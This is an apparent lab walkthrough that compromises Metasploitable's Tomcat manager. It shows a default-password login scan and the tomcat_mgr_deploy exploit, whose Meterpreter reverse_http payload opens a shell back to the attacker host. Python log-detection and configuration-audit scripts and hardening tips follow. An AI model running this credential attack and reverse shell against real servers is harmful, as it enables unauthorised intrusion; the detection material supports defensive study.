[-] 192.168.0.108:8180 TOMCAT_MGR - [07/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.0.108:8180 TOMCAT_MGR - [08/45] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] 192.168.0.108:8180 TOMCAT_MGR - [08/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.0.108:8180 TOMCAT_MGR - [09/45] - Trying username:'cxsdk' with password:'cxsdk'
[-] 192.168.0.108:8180 TOMCAT_MGR - [09/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.0.108:8180 TOMCAT_MGR - [10/45] - Trying username:'ADMIN' with password:'ADMIN'
[-] 192.168.0.108:8180 TOMCAT_MGR - [10/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.0.108:8180 TOMCAT_MGR - [11/45] - Trying username:'xampp' with password:'xampp'
[-] 192.168.0.108:8180 TOMCAT_MGR - [11/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.0.108:8180 TOMCAT_MGR - [12/45] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [12/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.0.108:8180 TOMCAT_MGR - [13/45] - Trying username:'cxsdk' with password:'kdsxc'
[-] 192.168.0.108:8180 TOMCAT_MGR - [13/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.0.108:8180 TOMCAT_MGR - [14/45] - Trying username:'root' with password:'owaspbwa'
[-] 192.168.0.108:8180 TOMCAT_MGR - [14/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [15/45] - Trying username:'admin' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [15/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [16/45] - Trying username:'admin' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [16/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [17/45] - Trying username:'admin' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [17/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [18/45] - Trying username:'admin' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [18/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [19/45] - Trying username:'admin' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [19/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [20/45] - Trying username:'manager' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [20/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [21/45] - Trying username:'manager' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [21/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [22/45] - Trying username:'manager' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [22/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [23/45] - Trying username:'manager' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [23/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [24/45] - Trying username:'manager' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [24/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [25/45] - Trying username:'role1' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [25/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [26/45] - Trying username:'role1' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [26/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [27/45] - Trying username:'role1' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [27/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [28/45] - Trying username:'role1' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [28/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [29/45] - Trying username:'role1' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [29/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [30/45] - Trying username:'root' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [30/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [31/45] - Trying username:'root' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [31/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [32/45] - Trying username:'root' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [32/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [33/45] - Trying username:'root' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [33/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [34/45] - Trying username:'root' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [34/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [35/45] - Trying username:'both' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [35/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [36/45] - Trying username:'both' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [36/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [37/45] - Trying username:'both' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [37/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [38/45] - Trying username:'both' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [38/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [39/45] - Trying username:'both' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [39/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [40/45] - Trying username:'both' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [40/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



Look at that! Reading this output carefully, we can see that the default wordlist already found a valid user:pass combination (tomcat:tomcat). We won't even need a custom wordlist in this case. It also confirmed that the default manager directory is valid, so we don't need to test another one. Now let's look for our actual exploit.


msf (tomcat_mgr_login) > search tomcat

Matching Modules
================

Name                                                 Disclosure Date          Rank       Description
----                                                 ---------------          ----       -----------
auxiliary/admin/http/tomcat_administration                                    normal     Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal                                    normal     Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal                                 normal     TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding   2010-07-09 00:00:00 UTC  normal     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos                 2011-12-28 00:00:00 UTC  normal     Hashtable Collisions
auxiliary/scanner/http/tomcat_enum                                            normal     Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login                                       normal     Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy                 2009-11-09 00:00:00 UTC  excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution


The exploit we're going to use is mgr_deploy, with a reverse_http payload. Let's fill it in with the information we already have.


msf (tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf (tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
PASSWORD                   no        The password for the specified username
PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
Proxies                    no        Use a proxy chain
RHOST                      yes       The target address
RPORT     80               yes       The target port
USERNAME                   no        The username to authenticate as
VHOST                      no        HTTP server virtual host

Exploit target:

Id  Name
--  ----
0   Automatic

msf (tomcat_mgr_deploy) > set RHOST 192.168.0.108
RHOST => 192.168.0.108
msf (tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf (tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf (tomcat_mgr_deploy) > show payloads


Compatible Payloads
===================

Name                             Disclosure Date  Rank    Description
----                             ---------------  ----    -----------
generic/custom                                    normal  Custom Payload
generic/shell_bind_tcp                            normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                         normal  Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp                         normal  Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http                     normal  Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https                    normal  Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp                      normal  Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp                               normal  Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp                            normal  Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp                            normal  Java Command Shell, Reverse TCP Inline

msf (tomcat_mgr_deploy) > set PAYLOAD java/meterpreter/reverse_http
PAYLOAD => java/meterpreter/reverse_http
msf (tomcat_mgr_deploy) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf (tomcat_mgr_deploy) > exploit

[*] Started HTTP reverse handler on http://192.168.0.106:8443/
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6465 bytes as D3YHKcK8TOful.war ...
[*] Executing /D3YHKcK8TOful/qh3Q6Qaf2NVdciS7ngfbkqIBa04HxV.jsp...
[*] Undeploying D3YHKcK8TOful ...
[*] 192.168.0.108:51231 Request received for /INITJM...
Java: /INITJM
URL: "http://192.168.0.106:8443/FDnj_4IdkGPMI9c8doStx/\x00"
[*] Meterpreter session 2 opened (192.168.0.106:8443 -> 192.168.0.108:51231) at 2012-08-24 20:37:12 -0300
meterpreter >


Done! We made it, we're in. Let's run a few commands to confirm.


meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > ifconfig

Interface 1
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
Interface 2
============
Name : eth0 - eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.0.108
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe45:2ce8
IPv6 Netmask : ::

meterpreter > shell
Process 1 created.
Channel 1 created.

$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
$ whoami
tomcat55

$ ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

$ cd /tmp

$ pwd
/tmp

$ ls
4729.jsvc_up
cache37pgy7jar
cache37pgy8jar

$ halt
halt: Need to be root


And we really are inside! The whoami command shows that we're running as the tomcat55 user. We can wander around and run a few commands on the system, but we don't have many privileges; you can see that in the last command, which returned "Need to be root". We need to escalate privileges and get root access to play around more.

But that part is for another post, since this one was only meant to introduce the vulnerability and the exploits.
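What the session above looks like from the server side, as an added example that is not part of the original post or of Metasploit: a Python script that reads a Tomcat access log in the common pattern and flags the two signals this attack leaves behind, a burst of 401 responses on /manager/* from one source (the login scan) and a context deployed through the manager API, requested once and undeployed again within minutes (the WAR drop). The log lines are constructed to match the session shown above; the timestamps, the thresholds, the administrator line from 192.168.0.50 and the /manager/text/ URIs for newer Tomcat versions are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs

# Constructed Tomcat access log in the common pattern (%h %l %u %t "%r" %s %b).
# Source address, context name and JSP name follow the session shown above;
# the timestamps and the administrator line from 192.168.0.50 are assumptions.
SAMPLE_LOG = """\
192.168.0.106 - - [24/Aug/2012:20:36:01 -0300] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.106 - - [24/Aug/2012:20:36:01 -0300] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.106 - - [24/Aug/2012:20:36:02 -0300] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.106 - - [24/Aug/2012:20:36:02 -0300] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.106 - - [24/Aug/2012:20:36:03 -0300] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.106 - - [24/Aug/2012:20:36:03 -0300] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.106 - tomcat [24/Aug/2012:20:36:04 -0300] "GET /manager/html HTTP/1.1" 200 19210
192.168.0.106 - tomcat [24/Aug/2012:20:37:10 -0300] "PUT /manager/deploy?path=/D3YHKcK8TOful HTTP/1.1" 200 75
192.168.0.106 - - [24/Aug/2012:20:37:11 -0300] "GET /D3YHKcK8TOful/qh3Q6Qaf2NVdciS7ngfbkqIBa04HxV.jsp HTTP/1.1" 200 0
192.168.0.106 - tomcat [24/Aug/2012:20:37:12 -0300] "GET /manager/undeploy?path=/D3YHKcK8TOful HTTP/1.1" 200 77
192.168.0.50 - admin [24/Aug/2012:09:00:00 -0300] "GET /manager/html HTTP/1.1" 200 19210
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager URIs that create or remove a web application. Tomcat 5.5/6 expose them
# directly under /manager; Tomcat 7+ moved the scriptable API under /manager/text.
DEPLOY_URIS = {"/manager/deploy", "/manager/text/deploy"}
UNDEPLOY_URIS = {"/manager/undeploy", "/manager/text/undeploy"}


def parse_access_log(text):
    """Turn access-log lines into event dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        events.append({
            "host": m.group("host"),
            "user": m.group("user"),
            "time": datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z"),
            "method": m.group("method"),
            "path": path,
            "query": query,
            "status": int(m.group("status")),
        })
    return events


def find_manager_bruteforce(events, threshold=5, window_seconds=60):
    """Sources that collected at least `threshold` 401s on /manager/* inside one
    window. Returns {source: peak number of failures seen in any window}."""
    failures = defaultdict(list)
    for ev in events:
        if ev["path"].startswith("/manager") and ev["status"] == 401:
            failures[ev["host"]].append(ev["time"])
    hits = {}
    for host, times in failures.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):  # sliding window over the sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[host] = peak
    return hits


def find_shortlived_deploys(events, max_lifetime_seconds=300):
    """Contexts deployed through the manager API and undeployed again within
    `max_lifetime_seconds`, with every request served by that context in between.
    A WAR that is dropped, executed once and removed is exactly what the
    exploit session above produced."""
    pending = {}  # context path -> deploy event
    findings = []
    for ev in events:
        if ev["status"] != 200:
            continue
        ctx = parse_qs(ev["query"]).get("path", [None])[0]
        if ev["path"] in DEPLOY_URIS and ctx:
            pending[ctx] = ev
        elif ev["path"] in UNDEPLOY_URIS and ctx in pending:
            deployed = pending.pop(ctx)
            lifetime = (ev["time"] - deployed["time"]).total_seconds()
            if lifetime > max_lifetime_seconds:
                continue
            served = [e["path"] for e in events
                      if e["path"].startswith(ctx + "/")
                      and deployed["time"] <= e["time"] <= ev["time"]]
            findings.append({"context": ctx, "source": deployed["host"],
                             "user": deployed["user"], "lifetime_seconds": lifetime,
                             "requests": served})
    return findings


if __name__ == "__main__":
    evs = parse_access_log(SAMPLE_LOG)
    for host, n in find_manager_bruteforce(evs).items():
        print(f"[!] manager login scan from {host}: {n} failures in one window")
    for f in find_shortlived_deploys(evs):
        print(f"[!] short-lived context {f['context']} deployed by {f['user']}@{f['source']}, "
              f"lived {f['lifetime_seconds']:.0f}s, served {f['requests']}")
```

The two checks are deliberately independent: the login scan is visible even when the credentials never work, and the deploy/undeploy pair is visible even when the attacker already had a valid password and produced no 401 at all. The HTML upload form of newer Tomcat versions (/manager/html/upload) carries the context name in the multipart body rather than the query string, so it needs the WAR filename from the manager's own log rather than the access log.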


Preventing the attack


OK, I've found out how to attack and where the way in is, but now what? How do I fix this?

Well, there isn't a lot to do at this point, but here goes:

  • Always keep Apache Tomcat up to date
  • Don't use obvious passwords
  • If possible, move the manager directory to something less obvious
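A way to check the second item against the actual configuration, as an added example that is not the post's or Tomcat's own code: a Python audit of tomcat-users.xml that flags accounts holding manager or admin roles whose password is one of the defaults the scan above tried, equals the username, or is short, beside a check that the manager context (conf/Catalina/localhost/manager.xml) restricts client addresses with a RemoteAddrValve, which is the supported way of keeping the manager off the network when renaming the directory is not practical. Both tomcat-users.xml fragments and both context fragments are constructed; the hardened password and the allowed workstation 192.168.0.50 are placeholders.

```python
import xml.etree.ElementTree as ET

# Credentials the login scan above tried against the manager; any privileged
# account still using one of them is an immediate finding.
DEFAULT_WORDS = {"admin", "manager", "role1", "root", "tomcat", "s3cret", "both"}

# Roles that reach the manager or admin webapps. Tomcat 5.5 (Metasploitable) used
# "manager" and "admin"; Tomcat 7+ split them into finer-grained roles.
PRIVILEGED_ROLES = {"manager", "manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin", "admin-gui", "admin-script"}

# Constructed tomcat-users.xml in the shape the scan found: the account that
# manages the server is called tomcat and its password is tomcat.
WEAK_USERS_XML = """\
<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager,admin"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
</tomcat-users>
"""

# Constructed hardened version: one dedicated account, one role, and a long
# placeholder password (an assumption, not a real secret).
HARDENED_USERS_XML = """\
<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="deploy-ops" password="Xq7!vT2#mLw9rK4s" roles="manager-gui"/>
</tomcat-users>
"""

# conf/Catalina/localhost/manager.xml as shipped (reachable from any address)
# and with a RemoteAddrValve allow-list (Tomcat 7+ regex syntax; the allowed
# workstation 192.168.0.50 is a placeholder).
OPEN_MANAGER_XML = '<Context privileged="true" antiResourceLocking="false"/>'
RESTRICTED_MANAGER_XML = r"""
<Context privileged="true" antiResourceLocking="false">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|192\.168\.0\.50"/>
</Context>
"""


def _local(tag):
    """Strip a namespace prefix ({uri}tag -> tag); Tomcat 7+ files declare one."""
    return tag.rsplit("}", 1)[-1]


def audit_users(xml_text, min_length=12):
    """Return one finding per privileged account with a guessable or short password."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or "?"
        password = el.get("password") or ""
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        held = sorted(roles & PRIVILEGED_ROLES)
        if not held:
            continue  # unprivileged accounts are out of scope for this check
        if password.lower() in DEFAULT_WORDS or password.lower() == name.lower():
            findings.append(f"{name}: default or username-derived password, roles {held}")
        elif len(password) < min_length:
            findings.append(f"{name}: password shorter than {min_length} characters, roles {held}")
    return findings


def manager_is_restricted(context_xml):
    """True when the manager context limits client addresses with a RemoteAddrValve."""
    for el in ET.fromstring(context_xml).iter():
        if (_local(el.tag) == "Valve"
                and el.get("className", "").endswith(".RemoteAddrValve")
                and el.get("allow")):
            return True
    return False


if __name__ == "__main__":
    for label, xml_text in (("weak", WEAK_USERS_XML), ("hardened", HARDENED_USERS_XML)):
        print(f"{label} tomcat-users.xml: {audit_users(xml_text) or 'no findings'}")
    print("manager restricted (shipped):", manager_is_restricted(OPEN_MANAGER_XML))
    print("manager restricted (allow-list):", manager_is_restricted(RESTRICTED_MANAGER_XML))
```

The audit only looks at accounts that can actually reach the manager, because that is the set the scan above was after; the unprivileged role1 account with the same bad password would matter for other reasons but cannot deploy a WAR. Pair the allow-list with the first item on the list, since an up-to-date Tomcat also stores the manager passwords digested instead of in clear text.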

That's it for today! We've seen one of Metasploitable's flaws, and more are coming soon.